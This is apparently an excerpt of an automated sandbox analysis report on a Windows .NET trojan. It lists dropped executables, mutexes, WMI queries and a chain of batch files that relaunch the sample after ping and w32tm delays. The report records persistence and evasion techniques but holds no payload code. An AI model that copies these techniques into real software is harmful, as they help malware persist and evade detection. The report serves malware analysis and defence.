                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF848A79F3832_2_00007FF848A79F38
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF848A20DA032_2_00007FF848A20DA0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF848BFD8DF32_2_00007FF848BFD8DF
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF848C002D032_2_00007FF848C002D0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF848C0C52832_2_00007FF848C0C528
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF848C0C58532_2_00007FF848C0C585
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF848C11CC532_2_00007FF848C11CC5
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF848BED3CF32_2_00007FF848BED3CF
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF848BEBB9D32_2_00007FF848BEBB9D
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF848BF2B7132_2_00007FF848BF2B71
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF848BED4D332_2_00007FF848BED4D3
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF848BED44232_2_00007FF848BED442
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF848BC014532_2_00007FF848BC0145
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF848BDDB5932_2_00007FF848BDDB59
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF848BDE2B532_2_00007FF848BDE2B5
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF848BD63FB32_2_00007FF848BD63FB
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF84917F91232_2_00007FF84917F912
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF84917E4BA32_2_00007FF84917E4BA
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF84917DD3D32_2_00007FF84917DD3D
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF8491592AE32_2_00007FF8491592AE
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF84915109A32_2_00007FF84915109A
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeCode function: 32_2_00007FF84912386F32_2_00007FF84912386F
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AQotzTRR.log CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                            Source: teh76E2k50.exe, 00000000.00000002.2337912560.000000001BC62000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs teh76E2k50.exe
                            Source: teh76E2k50.exe, 00000000.00000002.2338728204.000000001BD8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs teh76E2k50.exe
                            Source: teh76E2k50.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs teh76E2k50.exe
                            Source: teh76E2k50.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: teh76E2k50.exe, mD10jnSFKu6YL9mCDNG.csCryptographic APIs: 'CreateDecryptor'
                            Source: teh76E2k50.exe, mD10jnSFKu6YL9mCDNG.csCryptographic APIs: 'CreateDecryptor'
                            Source: teh76E2k50.exe, mD10jnSFKu6YL9mCDNG.csCryptographic APIs: 'CreateDecryptor'
                            Source: teh76E2k50.exe, mD10jnSFKu6YL9mCDNG.csCryptographic APIs: 'CreateDecryptor'
                            Source: classification engineClassification label: mal100.troj.evad.winEXE@88/326@0/1
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Program Files\Windows Mail\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\SEWrteSu.logJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2656:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5136:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5840:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1860:120:WilError_03
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeMutant created: \Sessions\1\BaseNamedObjects\Local\2d062fa903e8d66abace64e65a2d2f72654506766e417b5e44d013eab6e9c74a
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6480:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2272:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5796:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5052:120:WilError_03
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\AppData\Local\Temp\d42RoYfj2gJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HL35FbYWw1.bat"
                            Source: teh76E2k50.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: teh76E2k50.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile read: C:\Users\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: teh76E2k50.exeReversingLabs: Detection: 71%
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile read: C:\Users\user\Desktop\teh76E2k50.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\teh76E2k50.exe "C:\Users\user\Desktop\teh76E2k50.exe"
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HL35FbYWw1.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uHdcbfRrII.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ybJBPcXt9a.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\znx0BCuWHE.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8JExSyzmRo.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ibWrXDwbZz.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\tOMWzubzd4.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yFJPVaLwHB.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dxSYZSKoEG.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TCMSovEgtl.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\teh76E2k50.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HL35FbYWw1.bat" Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uHdcbfRrII.bat" Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ybJBPcXt9a.bat" Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\znx0BCuWHE.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8JExSyzmRo.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ibWrXDwbZz.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\tOMWzubzd4.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yFJPVaLwHB.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dxSYZSKoEG.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TCMSovEgtl.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\teh76E2k50.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
